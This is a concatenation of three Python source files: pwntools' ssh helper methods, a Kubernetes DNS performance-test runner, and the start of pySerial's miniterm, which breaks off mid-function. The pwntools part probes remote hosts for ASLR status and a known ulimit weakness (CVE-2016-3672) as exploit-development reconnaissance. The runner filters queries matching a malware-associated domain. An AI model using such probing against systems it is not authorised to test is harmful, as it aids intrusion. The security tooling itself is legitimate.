def download_data(self, remote):
"""Downloads a file from the remote server and returns it as a string.
Arguments:
remote(str): The remote filename to download.
Examples:
>>> with file('/tmp/bar','w+') as f:
... f.write('Hello, world')
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass',
... cache=False)
>>> s.download_data('/tmp/bar')
'Hello, world'
>>> s._sftp = None
>>> s._tried_sftp = True
>>> s.download_data('/tmp/bar')
'Hello, world'
"""
with self.progress('Downloading %r' % remote) as p:
with open(self._download_to_cache(remote, p)) as fd:
return fd.read()
def download_file(self, remote, local = None):
"""Downloads a file from the remote server.
The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
calling the function twice has little overhead.
Arguments:
remote(str): The remote filename to download
local(str): The local filename to save it to. Default is to infer it from the remote filename.
"""
if not local:
local = os.path.basename(os.path.normpath(remote))
if os.path.basename(remote) == remote:
remote = os.path.join(self.cwd, remote)
with self.progress('Downloading %r to %r' % (remote, local)) as p:
local_tmp = self._download_to_cache(remote, p)
# Check to see if an identical copy of the file already exists
if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
"""Recursively downloads a directory from the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
if self.sftp:
remote = str(self.sftp.normalize(remote))
else:
with context.local(log_level='error'):
remote = self.system('readlink -f ' + sh_string(remote))
dirname = os.path.dirname(remote)
basename = os.path.basename(remote)
local = local or '.'
local = os.path.expanduser(local)
self.info("Downloading %r to %r" % (basename,local))
with context.local(log_level='error'):
remote_tar = self.mktemp()
cmd = 'tar -C %s -czf %s %s' % \
(sh_string(dirname),
sh_string(remote_tar),
sh_string(basename))
tar = self.system(cmd)
if 0 != tar.wait():
self.error("Could not create remote tar")
local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
self.download_file(remote_tar, local_tar.name)
tar = tarfile.open(local_tar.name)
tar.extractall(local)
def upload_data(self, data, remote):
"""Uploads some data into a file on the remote server.
Arguments:
data(str): The data to upload.
remote(str): The filename to upload it to.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.upload_data('Hello, world', '/tmp/upload_foo')
>>> print file('/tmp/upload_foo').read()
Hello, world
>>> s._sftp = False
>>> s._tried_sftp = True
>>> s.upload_data('Hello, world', '/tmp/upload_bar')
>>> print file('/tmp/upload_bar').read()
Hello, world
"""
# If a relative path was provided, prepend the cwd
if os.path.normpath(remote) == os.path.basename(remote):
remote = os.path.join(self.cwd, remote)
if self.sftp:
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.sftp.put(f.name, remote)
return
with context.local(log_level = 'ERROR'):
cmd = 'cat > ' + sh_string(remote)
s = self.run(cmd, tty=False)
s.send(data)
s.shutdown('send')
data = s.recvall()
result = s.wait()
if result != 0:
self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
"""Uploads a file to the remote server. Returns the remote filename.
Arguments:
filename(str): The local filename to download
remote(str): The remote filename to save it to. Default is to infer it from the local filename."""
if remote == None:
remote = os.path.normpath(filename)
remote = os.path.basename(remote)
remote = os.path.join(self.cwd, remote)
with open(filename) as fd:
data = fd.read()
self.info("Uploading %r to %r" % (filename,remote))
self.upload_data(data, remote)
return remote
def upload_dir(self, local, remote=None):
"""Recursively uploads a directory onto the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
local = os.path.expanduser(local)
dirname = os.path.dirname(local)
basename = os.path.basename(local)
if not os.path.isdir(local):
self.error("%r is not a directory" % local)
msg = "Uploading %r to %r" % (basename,remote)
with self.waitfor(msg) as w:
# Generate a tarfile with everything inside of it
local_tar = tempfile.mktemp()
with tarfile.open(local_tar, 'w:gz') as tar:
tar.add(local, basename)
# Upload and extract it
with context.local(log_level='error'):
remote_tar = self.mktemp('--suffix=.tar.gz')
self.upload_file(local_tar, remote_tar)
untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
message = untar.recvrepeat(2)
if untar.wait() != 0:
self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
"""upload(file_or_directory, remote=None)
Upload a file or directory to the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
remote(str): Local path to store the data.
By default, uses the working directory.
"""
if isinstance(file_or_directory, str):
file_or_directory = os.path.expanduser(file_or_directory)
file_or_directory = os.path.expandvars(file_or_directory)
if os.path.isfile(file_or_directory):
return self.upload_file(file_or_directory, remote)
if os.path.isdir(file_or_directory):
return self.upload_dir(file_or_directory, remote)
self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
"""download(file_or_directory, local=None)
Download a file or directory from the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
local(str): Local path to store the data.
By default, uses the current directory.
"""
if not self.sftp:
self.error("Cannot determine remote file type without SFTP")
if 0 == self.system('test -d ' + sh_string(file_or_directory)).wait():
self.download_dir(file_or_directory, local)
else:
self.download_file(file_or_directory, local)
put = upload
get = download
def unlink(self, file):
"""unlink(file)
Delete the file on the remote host
Arguments:
file(str): Path to the file
"""
if not self.sftp:
self.error("unlink() is only supported if SFTP is supported")
return self.sftp.unlink(file)
def libs(self, remote, directory = None):
"""Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output
and downloading the relevant files.
The directory argument specified where to download the files. This defaults
to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server."""
libs = self._libs_remote(remote)
remote = self.readlink('-f',remote).strip()
libs[remote] = 0
if directory == None:
directory = self.host
directory = os.path.realpath(directory)
res = {}
seen = set()
for lib, addr in libs.items():
local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
if not local.startswith(directory):
self.warning('This seems fishy: %r' % lib)
continue
misc.mkdir_p(os.path.dirname(local))
if lib not in seen:
self.download_file(lib, local)
seen.add(lib)
res[local] = addr
return res
def interactive(self, shell=None):
"""Create an interactive session.
This is a simple wrapper for creating a new
:class:`pwnlib.tubes.ssh.ssh_channel` object and calling
:meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
s = self.shell(shell)
if self.cwd != '.':
cmd = 'cd ' + sh_string(self.cwd)
s.sendline(cmd)
s.interactive()
s.close()
def set_working_directory(self, wd = None, symlink = False):
"""Sets the working directory in which future commands will
be run (via ssh.run) and to which files will be uploaded/downloaded
from if no path is provided
Note:
This uses ``mktemp -d`` under the covers, sets permissions
on the directory to ``0700``. This means that setuid binaries
will **not** be able to access files created in this directory.
In order to work around this, we also ``chmod +x`` the directory.
Arguments:
wd(string): Working directory. Default is to auto-generate a directory
based on the result of running 'mktemp -d' on the remote machine.
symlink(bool,str): Create symlinks in the new directory.
The default value, ``False``, implies that no symlinks should be
created.
A string value is treated as a path that should be symlinked.
It is passed directly to the shell on the remote end for expansion,
so wildcards work.
Any other value is treated as a boolean, where ``True`` indicates
that all files in the "old" working directory should be symlinked.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> cwd = s.set_working_directory()
>>> s.ls()
''
>>> s.pwd() == cwd
True
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> homedir = s.pwd()
>>> _=s.touch('foo')
>>> _=s.set_working_directory()
>>> assert s.ls() == ''
>>> _=s.set_working_directory(homedir)
>>> assert 'foo' in s.ls().split()
>>> _=s.set_working_directory(symlink=True)
>>> assert 'foo' in s.ls().split()
>>> assert homedir != s.pwd()
>>> symlink=os.path.join(homedir,'*')
>>> _=s.set_working_directory(symlink=symlink)
>>> assert 'foo' in s.ls().split()
>>> assert homedir != s.pwd()
"""
status = 0
if symlink and not isinstance(symlink, str):
symlink = os.path.join(self.pwd(), '*')
if not wd:
wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
wd = wd.strip()
if status:
self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))
else:
cmd = 'ls ' + sh_string(wd)
_, status = self.run_to_end(cmd, wd = '.')
if status:
self.error("%r does not appear to exist" % wd)
self.info("Working directory: %r" % wd)
self.cwd = wd
if symlink:
self.ln('-s', symlink, '.')
return self.cwd
def write(self, path, data):
"""Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
return self.upload_data(data, path)
def read(self, path):
"""Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
return self.download_data(path)
def _init_remote_platform_info(self):
"""Fills _platform_info, e.g.:
::
{'distro': 'Ubuntu\n',
'distro_ver': '14.04\n',
'machine': 'x86_64',
'node': 'pwnable.kr',
'processor': 'x86_64',
'release': '3.11.0-12-generic',
'system': 'linux',
'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
"""
if self._platform_info:
return
def preexec():
import platform
print('\n'.join(platform.uname()))
with context.quiet:
with self.process('true', preexec_fn=preexec) as io:
self._platform_info = {
'system': io.recvline().lower().strip(),
'node': io.recvline().lower().strip(),
'release': io.recvline().lower().strip(),
'version': io.recvline().lower().strip(),
'machine': io.recvline().lower().strip(),
'processor': io.recvline().lower().strip(),
'distro': 'Unknown',
'distro_ver': ''
}
try:
if not self.which('lsb_release'):
return
with self.process(['lsb_release', '-irs']) as io:
self._platform_info.update({
'distro': io.recvline().strip(),
'distro_ver': io.recvline().strip()
})
except Exception:
pass
@property
def os(self):
""":class:`str`: Operating System of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(os=self._platform_info['system']):
return context.os
except Exception:
return "Unknown"
@property
def arch(self):
""":class:`str`: CPU Architecture of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(arch=self._platform_info['machine']):
return context.arch
except Exception:
return "Unknown"
@property
def bits(self):
""":class:`str`: Pointer size of the remote machine."""
try:
with context.local():
context.clear()
context.arch = self.arch
return context.bits
except Exception:
return context.bits
@property
def version(self):
""":class:`tuple`: Kernel version of the remote machine."""
try:
self._init_remote_platform_info()
vers = self._platform_info['release']
# 3.11.0-12-generic
expr = r'([0-9]+\.?)+'
vers = re.search(expr, vers).group()
return tuple(map(int, vers.split('.')))
except Exception:
return (0,0,0)
@property
def distro(self):
""":class:`tuple`: Linux distribution name and release."""
try:
self._init_remote_platform_info()
return (self._platform_info['distro'], self._platform_info['distro_ver'])
except Exception:
return ("Unknown", "Unknown")
@property
def aslr(self):
""":class:`bool`: Whether ASLR is enabled on the system.
Example:
>>> s = ssh("travis", "example.pwnme")
>>> s.aslr
True
"""
if self._aslr is None:
if self.os != 'linux':
self.warn_once("Only Linux is supported for ASLR checks.")
self._aslr = False
else:
with context.quiet:
rvs = self.read('/proc/sys/kernel/randomize_va_space')
self._aslr = not rvs.startswith('0')
return self._aslr
@property
def aslr_ulimit(self):
""":class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
import pwnlib.elf.elf
import pwnlib.shellcraft
if self._aslr_ulimit is not None:
return self._aslr_ulimit
# This test must run a 32-bit binary, fix the architecture
arch = {
'amd64': 'i386',
'aarch64': 'arm'
}.get(self.arch, self.arch)
with context.local(arch=arch, bits=32, os=self.os, aslr=True):
with context.quiet:
try:
sc = pwnlib.shellcraft.cat('/proc/self/maps') \
+ pwnlib.shellcraft.exit(0)
elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
except Exception:
self.warn_once("Can't determine ulimit ASLR status")
self._aslr_ulimit = False
return self._aslr_ulimit
def preexec():
import resource
try:
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
except Exception:
pass
# Move to a new temporary directory
cwd = self.cwd
tmp = self.set_working_directory()
try:
self.upload(elf.path, './aslr-test')
except IOError:
self.warn_once("Couldn't check ASLR ulimit trick")
self._aslr_ulimit = False
return False
self.process(['chmod', '+x', './aslr-test']).wait()
maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()
# Move back to the old directory
self.cwd = cwd
# Clean up the files
self.process(['rm', '-rf', tmp]).wait()
# Check for 555555000 (1/3 of the address space for PAE)
# and for 40000000 (1/3 of the address space with 3BG barrier)
self._aslr_ulimit = bool('55555000' in maps or '40000000' in maps)
return self._aslr_ulimit
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
else:
with open(path, 'r+') as f:
return f.read()
def checksec(self, banner=True):
"""checksec()
Prints a helpful message about the remote system.
Arguments:
banner(bool): Whether to print the path to the ELF binary.
"""
cached = self._checksec_cache()
if cached:
return cached
red = text.red
green = text.green
yellow = text.yellow
res = [
"%s@%s:" % (self.user, self.host),
"Distro".ljust(10) + ' '.join(self.distro),
"OS:".ljust(10) + self.os,
"Arch:".ljust(10) + self.arch,
"Version:".ljust(10) + '.'.join(map(str, self.version)),
"ASLR:".ljust(10) + {
True: green("Enabled"),
False: red("Disabled")
}[self.aslr]
]
if self.aslr_ulimit:
res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]
cached = '\n'.join(res)
self._checksec_cache(cached)
return cached
|
runner.py | #!/usr/bin/env python3
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import logging
import os
import subprocess
import time
import traceback
import yaml
import threading
import re
import queue
from subprocess import PIPE
from data import Parser, ResultDb
from params import ATTRIBUTE_CLUSTER_DNS, ATTRIBUTE_NODELOCAL_DNS, Inputs, TestCases, QueryFile, RunLengthSeconds
_log = logging.getLogger(__name__)
_app_label = 'app=dns-perf-server'
_client_podname = 'dns-perf-client'
_test_svc_label = 'app=test-svc'
_dnsperf_qfile_name='queryfile-example-current'
_dnsperf_qfile_path='ftp://ftp.nominum.com/pub/nominum/dnsperf/data/queryfile-example-current.gz'
# Remove dns queries to this host since it is associated with behavior pattern
# of some malware
_remove_query_pattern=["setting3[.]yeahost[.]com"]
MAX_TEST_SVC = 20
def add_prefix(prefix, text):
return '\n'.join([prefix + l for l in text.decode().split('\n')])
class Runner(object):
"""
Runs the performance experiments.
"""
def __init__(self, args):
"""
|args| parsed command line args.
"""
self.args = args
self.deployment_yaml = yaml.load(open(self.args.deployment_yaml, 'r'))
self.configmap_yaml = yaml.load(open(self.args.configmap_yaml, 'r')) if \
self.args.configmap_yaml else None
self.service_yaml = yaml.load(open(self.args.service_yaml, 'r')) if \
self.args.service_yaml else None
self.dnsperf_yaml = yaml.load(open(self.args.dnsperf_yaml, 'r'))
self.test_params = TestCases.load_from_file(args.params)
if self.args.run_large_queries:
self.test_params.set_param(QueryFile().name, _dnsperf_qfile_name)
self.args.testsvc_yaml = yaml.load(open(self.args.testsvc_yaml, 'r')) if \
self.args.testsvc_yaml else None
self.server_node = None
self.use_existing = False
self.db = ResultDb(self.args.db) if self.args.db else None
self.attributes = set()
if self.args.use_cluster_dns:
_log.info('Using cluster DNS for tests')
self.args.dns_ip = self._get_dns_ip(self.args.dns_server)
self.attributes.add(ATTRIBUTE_CLUSTER_DNS)
self.use_existing = True
elif self.args.nodecache_ip:
_log.info('Using existing node-local-dns for tests')
self.args.dns_ip = self.args.nodecache_ip
self.attributes.add(ATTRIBUTE_NODELOCAL_DNS)
self.use_existing = True
_log.info('DNS service IP is %s', args.dns_ip)
def go(self):
"""
Run the performance tests.
"""
self._select_nodes()
test_cases = self.test_params.generate(self.attributes)
if len(test_cases) == 0:
_log.warning('No test cases')
return 0
try:
self._ensure_out_dir(test_cases[0].run_id)
client_pods=self._reset_client()
_log.info('Starting creation of test services')
self._create_test_services()
last_deploy_yaml = None
last_config_yaml = None
for test_case in test_cases:
try:
inputs = Inputs(self.deployment_yaml, self.configmap_yaml,
['/dnsperf', '-s', self.args.dns_ip])
test_case.configure(inputs)
# pin server to a specific node
inputs.deployment_yaml['spec']['template']['spec']['nodeName'] = \
self.server_node
if not self.use_existing and (
yaml.dump(inputs.deployment_yaml) !=
yaml.dump(last_deploy_yaml) or
yaml.dump(inputs.configmap_yaml) !=
yaml.dump(last_config_yaml)):
_log.info('Creating server with new parameters')
self._teardown()
self._create(inputs.deployment_yaml)
self._create(self.service_yaml)
if self.configmap_yaml is not None:
self._create(self.configmap_yaml)
self._wait_for_status(True)
test_threads=[]
#Spawn off a thread to run the test case in each client pod simultaneously.
for podname in client_pods:
_log.debug('Running test in pod %s', podname)
tc = copy.copy(test_case)
tc.pod_name = podname
dt = threading.Thread(target=self._run_perf,args=[tc,inputs, podname])
test_threads.append(dt)
dt.start()
for thread in test_threads:
thread.join()
last_deploy_yaml = inputs.deployment_yaml
last_config_yaml = inputs.configmap_yaml
except Exception:
_log.info('Exception caught during run, cleaning up. %s',
traceback.format_exc())
self._teardown()
self._teardown_client()
raise
finally:
self._teardown()
self._teardown_client()
if self.db is not None:
self.db.commit()
return 0
def _kubectl(self, stdin, *args):
"""
|return| (return_code, stdout, stderr)
"""
cmdline = [self.args.kubectl_exec] + list(args)
_log.debug('kubectl %s', cmdline)
if stdin:
_log.debug('kubectl stdin\n%s', add_prefix('in | ', stdin))
proc = subprocess.Popen(cmdline, stdin=PIPE, stdout=PIPE, stderr=PIPE)
out, err = proc.communicate(stdin)
ret = proc.wait()
_log.debug('kubectl ret=%d', ret)
_log.debug('kubectl stdout\n%s', add_prefix('out | ', out))
_log.debug('kubectl stderr\n%s', add_prefix('err | ', err))
return proc.wait(), out, err
def _create(self, yaml_obj):
_log.debug('applying yaml: %s', yaml.dump(yaml_obj))
ret, out, err = self._kubectl(yaml.dump(yaml_obj), 'create', '-f', '-')
if ret != 0:
_log.error('Could not create dns: %d\nstdout:\n%s\nstderr:%s\n',
ret, out, err)
raise Exception('create failed')
_log.info('Create %s/%s ok', yaml_obj['kind'], yaml_obj['metadata']['name'])
def _run_top(self, output_q):
kubedns_top_args = ['-l', 'k8s-app=kube-dns', '-n', 'kube-system']
if self.args.nodecache_ip:
perfserver_top_args = ['-l', 'k8s-app=node-local-dns', '-n', 'kube-system']
else:
perfserver_top_args = ['-l', _app_label]
run_time = int(self.test_params.get_param(RunLengthSeconds().name)[0])
t_end = time.time() + run_time
while time.time() < t_end:
code, perfout, err = self._kubectl(*([None, 'top', 'pod'] + perfserver_top_args))
code, kubeout, err = self._kubectl(*([None, 'top', 'pod'] + kubedns_top_args))
# Output is of the form:
# NAME CPU(cores) MEMORY(bytes)
# kube-dns-686548bc64-4q7wg 2m 31Mi
pcpu = re.findall(' \d+m ', perfout)
pmem = re.findall(' \d+Mi ', perfout)
kcpu = re.findall(' \d+m ', kubeout)
kmem = re.findall(' \d+Mi ', kubeout)
max_perfserver_cpu = 0
max_perfserver_mem = 0
max_kubedns_cpu = 0
max_kubedns_mem = 0
for c in pcpu:
val = int(re.findall('\d+', c)[0])
if val > max_perfserver_cpu:
max_perfserver_cpu = val
for m in pmem:
val = int(re.findall('\d+', m)[0])
if val > max_perfserver_mem:
max_perfserver_mem = val
for c in kcpu:
val = int(re.findall('\d+', c)[0])
if val > max_kubedns_cpu:
max_kubedns_cpu = val
for m in kmem:
val = int(re.findall('\d+', m)[0])
if val > max_kubedns_mem:
max_kubedns_mem = val
time.sleep(2)
output_q.put(max_perfserver_cpu)
output_q.put(max_perfserver_mem)
output_q.put(max_kubedns_cpu)
output_q.put(max_kubedns_mem)
def _run_perf(self, test_case, inputs, podname):
_log.info('Running test case: %s', test_case)
output_file = '%s/run-%s/result-%s-%s.out' % \
(self.args.out_dir, test_case.run_id, test_case.run_subid, test_case.pod_name)
_log.info('Writing to output file %s', output_file)
res_usage = queue.Queue()
dt = threading.Thread(target=self._run_top,args=[res_usage])
dt.start()
header = '''### run_id {run_id}:{run_subid}
### date {now}
### settings {test_case}
'''.format(run_id=test_case.run_id,
run_subid=test_case.run_subid,
now=time.ctime(),
test_case=json.dumps(test_case.to_yaml()))
with open(output_file + '.raw', 'w') as fh:
fh.write(header)
cmdline = inputs.dnsperf_cmdline
code, out, err = self._kubectl(
*([None, 'exec', podname, '--'] + [str(x) for x in cmdline]))
fh.write('%s\n' % add_prefix('out | ', out))
fh.write('%s\n' % add_prefix('err | ', err))
if code != 0:
raise Exception('error running dnsperf - %s, podname %s', err, podname)
dt.join()
with open(output_file, 'w') as fh:
results = {}
results['params'] = test_case.to_yaml()
results['code'] = code
results['stdout'] = out.decode().split('\n')
results['stderr'] = err.decode().split('\n')
results['data'] = {}
try:
parser = Parser(out)
parser.parse()
_log.info('Test results parsed')
results['data']['ok'] = True
results['data']['msg'] = None
for key, value in list(parser.results.items()):
results['data'][key] = value
results['data']['max_perfserver_cpu'] = res_usage.get()
results['data']['max_perfserver_memory'] = res_usage.get()
results['data']['max_kubedns_cpu'] = res_usage.get()
results['data']['max_kubedns_memory'] = res_usage.get()
results['data']['histogram'] = parser.histogram
except Exception as exc:
_log.error('Error parsing results: %s', exc)
results['data']['ok'] = False
results['data']['msg'] = 'parsing error:\n%s' % traceback.format_exc()
fh.write(yaml.dump(results))
if self.db is not None and results['data']['ok']:
self.db.put(results)
def _create_test_services(self):
if not self.args.testsvc_yaml:
_log.info("Not creating test services since no yaml was provided")
return
# delete existing services if any
self._kubectl(None, 'delete', 'services', '-l', _test_svc_label)
for index in range(1,MAX_TEST_SVC + 1):
self.args.testsvc_yaml['metadata']['name'] = "test-svc" + str(index)
self._create(self.args.testsvc_yaml)
def _select_nodes(self):
code, out, _ = self._kubectl(None, 'get', 'nodes', '-o', 'yaml')
if code != 0:
raise Exception('error gettings nodes: %d', code)
nodes = [n['metadata']['name'] for n in yaml.load(out)['items']
if not ('unschedulable' in n['spec'] \
and n['spec']['unschedulable'])]
if len(nodes) < 2 and not self.args.single_node:
raise Exception('you need 2 or more worker nodes to run the perf test')
if self.use_existing:
return
if self.args.server_node:
if self.args.server_node not in nodes:
raise Exception('%s is not a valid node' % self.args.server_node)
_log.info('Manually selected server_node')
self.server_node = self.args.server_node
else:
self.server_node = nodes[0]
_log.info('Server node is %s', self.server_node)
def _get_dns_ip(self, svcname):
code, out, _ = self._kubectl(None, 'get', 'svc', '-o', 'yaml',
svcname, '-nkube-system')
if code != 0:
raise Exception('error gettings dns ip for service %s: %d' %(svcname, code))
try:
return yaml.load(out)['spec']['clusterIP']
except:
raise Exception('error parsing %s service, could not get dns ip' %(svcname))
def _teardown(self):
_log.info('Starting server teardown')
self._kubectl(None, 'delete', 'deployments', '-l', _app_label)
self._kubectl(None, 'delete', 'services', '-l', _app_label)
self._kubectl(None, 'delete', 'configmap', '-l', _app_label)
self._wait_for_status(False)
_log.info('Server teardown ok')
self._kubectl(None, 'delete', 'services', '-l', _test_svc_label)
if self.args.run_large_queries:
try:
subprocess.check_call(['rm', self.args.query_dir +_dnsperf_qfile_name])
except subprocess.CalledProcessError:
_log.info("Failed to delete query file")
def _reset_client(self):
self._teardown_client()
self._create(self.dnsperf_yaml)
client_pods=[]
while True:
code, pending, err = self._kubectl(None, 'get','deploy', 'dns-perf-client','--no-headers', '-o', 'custom-columns=:status.unavailableReplicas')
if pending.rstrip() != "<none>":
#Deployment not ready yet
_log.info("pending replicas in client deployment - '%s'", pending.rstrip())
time.sleep(5)
continue
code, client_pods, err = self._kubectl(None, 'get','pods', '-l', 'app=dns-perf-client', '--no-headers', '-o', 'custom-columns=:metadata.name')
if code != 0:
_log.error('Error: stderr\n%s', add_prefix('err | ', err))
raise Exception('error getting pod information: %d', code)
client_pods=client_pods.rstrip().decode().split('\n')
_log.info('got client pods "%s"', client_pods)
if len(client_pods) > 0:
break
_log.debug('waiting for client pods')
for podname in client_pods:
while True:
code, _, _ = self._kubectl(
None, 'exec', '-i', podname, '--', 'echo')
if code == 0:
break
time.sleep(1)
_log.info('Client pod ready for execution')
self._copy_query_files(podname)
return client_pods
def _copy_query_files(self, podname):
if self.args.run_large_queries:
try:
_log.info('Downloading large query file')
subprocess.check_call(['wget', _dnsperf_qfile_path])
subprocess.check_call(['gunzip', _dnsperf_qfile_path.decode().split('/')[-1]])
_log.info('Removing hostnames matching specified patterns')
for pattern in _remove_query_pattern:
subprocess.check_call(['sed', '-i', '-e', '/%s/d' %(pattern), _dnsperf_qfile_name])
subprocess.check_call(['mv', _dnsperf_qfile_name, self.args.query_dir])
except subprocess.CalledProcessError:
_log.info('Exception caught when downloading query files %s',
traceback.format_exc())
_log.info('Copying query files to client %s', podname)
tarfile_contents = subprocess.check_output(
['tar', '-czf', '-', self.args.query_dir])
code, _, _ = self._kubectl(
tarfile_contents,
'exec', '-i', podname, '--', 'tar', '-xzf', '-')
if code != 0:
raise Exception('error copying query files to client: %d' % code)
_log.info('Query files copied')
def _teardown_client(self):
_log.info('Starting client teardown')
self._kubectl(None, 'delete', 'deployment/dns-perf-client')
while True:
code, _, _ = self._kubectl(None, 'get', 'pod', _client_podname)
if code != 0:
break
time.sleep(1)
_log.info('Waiting for client pod to terminate')
_log.info('Client teardown complete')
def _wait_for_status(self, active):
while True:
code, out, err = self._kubectl(
None, 'get', '-o', 'yaml', 'pods', '-l', _app_label)
if code != 0:
_log.error('Error: stderr\n%s', add_prefix('err | ', err))
raise Exception('error getting pod information: %d', code)
pods = yaml.load(out)
_log.info('Waiting for server to be %s (%d pods active)',
'up' if active else 'deleted',
len(pods['items']))
if (active and len(pods['items']) > 0) or \
(not active and len(pods['items']) == 0):
break
time.sleep(1)
if active:
while True:
code, out, err = self._kubectl(
None,
'exec', _client_podname, '--',
'dig', '@' + self.args.dns_ip,
'kubernetes.default.svc.cluster.local.')
if code == 0:
break
_log.info('Waiting for DNS service to start')
time.sleep(1)
_log.info('DNS is up')
def _ensure_out_dir(self, run_id):
rundir_name = 'run-%s' % run_id
rundir = os.path.join(self.args.out_dir, rundir_name)
latest = os.path.join(self.args.out_dir, 'latest')
if not os.path.exists(rundir):
os.makedirs(rundir)
_log.info('Created rundir %s', rundir)
if os.path.exists(latest):
os.unlink(latest)
os.symlink(rundir_name, latest)
_log.info('Updated symlink %s', latest)
|
miniterm.py | #!/usr/bin/python
# Very simple serial terminal
# (C)2002-2011 Chris Liechti <cliechti@gmx.net>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped trough pythons
# repr, useful for debug purposes)
import sys, os, serial, threading
try:
from serial.tools.list_ports import comports
except ImportError:
comports = None
EXITCHARCTER = serial.to_bytes([0x1d]) # GS/CTRL+]
MENUCHARACTER = serial.to_bytes([0x14]) # Menu: CTRL+T
DEFAULT_PORT = None
DEFAULT_BAUDRATE = 9600
DEFAULT_RTS = None
DEFAULT_DTR = None
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+%c' % (ord('@') + ascii_code)
else:
return repr(character)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys is used and not the value at program start
def get_help_text():
return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-7s Send the menu character itself to remote
--- %(exchar)-7s Send the exit character itself to remote
--- %(info)-7s Show info
--- %(upload)-7s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)-7s RTS %(echo)-7s local echo
--- %(dtr)-7s DTR %(break)-7s BREAK
--- %(lfm)-7s line feed %(repr)-7s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- p change port
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % {
'version': getattr(serial, 'VERSION', 'unknown version'),
'exit': key_description(EXITCHARCTER),
'menu': key_description(MENUCHARACTER),
'rts': key_description('\x12'),
'repr': key_description('\x01'),
'dtr': key_description('\x04'),
'lfm': key_description('\x0c'),
'break': key_description('\x02'),
'echo': key_description('\x05'),
'info': key_description('\x09'),
'upload': key_description('\x15'),
'itself': key_description(MENUCHARACTER),
'exchar': key_description(EXITCHARCTER),
}
if sys.version_info >= (3, 0):
def character(b):
return b.decode('latin1')
else:
def character(b):
return b
LF = serial.to_bytes([10])
CR = serial.to_bytes([13])
CRLF = serial.to_bytes([13, 10])
X00 = serial.to_bytes([0])
X0E = serial.to_bytes([0x0e])
# first choose a platform dependant way to read single characters from the console
global console
if os.name == 'nt':
import msvcrt
class Console(object):
def __init__(self):
pass
def setup(self):
pass # Do nothing for 'nt'
def cleanup(self):
pass # Do nothing for 'nt'
def getkey(self):
while True:
z = msvcrt.getch()
if z == X00 or z == X0E: # functions keys, ignore
msvcrt.getch()
else:
if z == CR:
return LF
return z
console = Console()
elif os.name == 'posix':
import termios, sys, os
class Console(object):
def __init__(self):
self.fd = sys.stdin.fileno()
self.old = None
def setup(self):
self.old = termios.tcgetattr(self.fd)
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = os.read(self.fd, 1)
return c
def cleanup(self):
if self.old is not None:
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
console = Console()
def cleanup_console():
console.cleanup()
sys.exitfunc = cleanup_console # terminal modes have to be restored on exit...
else:
raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def dump_port_list():
if comports:
sys.stderr.write('\n--- Available ports:\n')
for port, desc, hwid in sorted(comports()):
#~ sys.stderr.write('--- %-20s %s [%s]\n' % (port, desc, hwid))
